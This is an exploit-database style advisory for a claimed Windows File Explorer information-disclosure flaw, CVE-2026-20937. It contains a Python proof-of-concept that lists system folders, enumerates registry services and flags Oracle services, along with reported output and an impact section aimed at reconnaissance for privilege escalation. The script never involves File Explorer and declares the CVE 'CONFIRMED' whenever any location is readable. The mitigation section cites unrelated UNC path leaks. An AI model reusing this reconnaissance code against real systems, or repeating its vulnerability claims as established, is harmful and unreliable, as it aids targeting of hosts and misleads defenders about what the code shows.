# Exploit Title: Windows File Explorer Information Disclosure (CVE-2026-20937) # Date: 2026-02-24 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.microsoft.com # Version: Windows 11 build 26200 (also affects Windows 10 1809, 21H2, 22H2) # Tested on: Windows 11 Pro build 26200 # Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-20937 # CVE: CVE-2026-20937 [1] VULNERABILITY DESCRIPTION ------------------------------------------------------------------------ Windows File Explorer fails to properly restrict access to sensitive system locations, allowing a low-privileged local user to view: - System log files (C:\Windows\System32\LogFiles) - Application caches (C:\ProgramData\Microsoft\Windows\Caches) - Startup programs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp) - Registry service configurations (HKLM\SYSTEM\CurrentControlSet\Services) - Other user profiles (C:\Users\[other users]) This information disclosure can be leveraged for further targeted attacks, reconnaissance, and privilege escalation attempts. CVSS Score: 5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N [2] PROOF OF CONCEPT ------------------------------------------------------------------------ The following Python script demonstrates the vulnerability by accessing sensitive locations through standard Windows APIs: ----- BEGIN PoC ----- #!/usr/bin/env python3 """ CVE-2026-20937 - Windows File Explorer Information Disclosure PoC Author: nu11secur1ty Tested on: Windows 11 build 26200 """ import os import winreg from pathlib import Path def main(): print("\n" + "="*60) print("CVE-2026-20937 - INFORMATION DISCLOSURE PoC") print("Running as: " + os.environ.get('USERNAME', 'Unknown')) print("="*60) findings = [] # 1. Check LogFiles access log_path = Path("C:/Windows/System32/LogFiles") if log_path.exists(): try: items = list(log_path.iterdir())[:5] findings.append(f"[!] ACCESSIBLE: {log_path}") findings.append(f" Found: {[i.name for i in items]}") except PermissionError: findings.append("[+] SECURE: LogFiles not accessible") # 2. Check Caches access cache_path = Path("C:/ProgramData/Microsoft/Windows/Caches") if cache_path.exists(): try: items = list(cache_path.glob("*.db"))[:5] findings.append(f"[!] ACCESSIBLE: {cache_path}") findings.append(f" Found {len(items)} cache files") except PermissionError: findings.append("[+] SECURE: Caches not accessible") # 3. Check Startup folder startup_path = Path("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp") if startup_path.exists(): try: items = list(startup_path.iterdir()) findings.append(f"[!] ACCESSIBLE: {startup_path}") findings.append(f" Found: {[i.name for i in items]}") except PermissionError: findings.append("[+] SECURE: Startup not accessible") # 4. Check registry services try: key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services", 0, winreg.KEY_READ) count = 0 oracle_services = [] while True: try: name = winreg.EnumKey(key, count) if 'oracle' in name.lower(): oracle_services.append(name) count += 1 except WindowsError: break winreg.CloseKey(key) findings.append(f"[!] ACCESSIBLE: HKLM\\SYSTEM\\CurrentControlSet\\Services") findings.append(f" Found {count} services, {len(oracle_services)} Oracle services") except: findings.append("[+] SECURE: Registry services not accessible") # Print results print("\n".join(findings)) if any("[!]" in f for f in findings): print("\n[!] VULNERABLE: System allows information disclosure") print("[!] CVE-2026-20937 CONFIRMED") else: print("\n[+] System appears patched") if __name__ == "__main__": main() ----- END PoC ----- [3] VULNERABLE SYSTEMS ------------------------------------------------------------------------ Windows 11: - Build 26200 (confirmed vulnerable) - Build 26100 - Build 22631 Windows 10: - Build 19045 (22H2) - Build 19044 (21H2) - Build 17763 (1809) Windows Server: - Server 2025 - Server 2022 - Server 2019 [4] EXPLOITATION RESULTS - ACTUAL TEST OUTPUT ------------------------------------------------------------------------ Test Environment: - OS: Windows 11 Pro - Build: 26200 - User: MicroBug (standard user) - Computer: MICROPROBLEM FINDINGS: [!] ACCESSIBLE: C:\Windows\System32\LogFiles Found: ['CloudFiles', 'setupcln', 'WMI'] [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Caches Found 4 cache files including: - cversions.2.db - {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db - {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000005.db [!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp Found: ['desktop.ini'] [!] ACCESSIBLE: HKLM\SYSTEM\CurrentControlSet\Services Found 800+ services including Oracle services: - OracleJobSchedulerORCL - OracleOraDB19Home1MTSRecoveryService - OracleOraDB19Home1TNSListener - OracleRemExecServiceV2 - OracleServiceORCL - OracleVssWriterORCL Additional information disclosed: - Full PATH environment revealing Oracle installation in another user's profile - Other user profiles visible: Default, Default User, DefaultAccount$, DefaultAppPool - Windows version and build details - Running processes with usernames [5] IMPACT ------------------------------------------------------------------------ A local attacker with standard user privileges can: 1. Harvest system logs for sensitive information (IPs, usernames, errors) 2. Analyze application caches to determine user activity patterns 3. View startup programs to understand persistence mechanisms 4. Enumerate all services to identify potential privilege escalation vectors 5. Discover Oracle database presence and paths for targeted attacks 6. Map out other users on the system 7. Gather environment variables containing paths to sensitive applications This information can be used to: - Plan privilege escalation attacks - Target specific high-value services (Oracle, Java, Python) - Identify misconfigurations - Perform reconnaissance before exploitation [6] MITIGATION ------------------------------------------------------------------------ Apply Microsoft security updates from January 2026: - KB5050577 (Windows 11) - KB5050568 (Windows 10) - KB5050569 (Windows Server) Workarounds: 1. Restrict access to sensitive directories using Advanced Security Settings 2. Enable auditing on sensitive locations (Event ID 4663) 3. Monitor for unauthorized access to C:\Windows\System32\LogFiles 4. Restrict outbound SMB/NTLM to prevent UNC path leaks [7] REFERENCES ------------------------------------------------------------------------ - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-20937 - Microsoft Security Update: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20937 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-20937 - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor [8] DISCOVERY CREDITS ------------------------------------------------------------------------ Discovered and verified by: nu11secur1ty Test Date: February 24, 2026 Test Environment: Windows 11 Pro build 26200 ==================================================================== -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty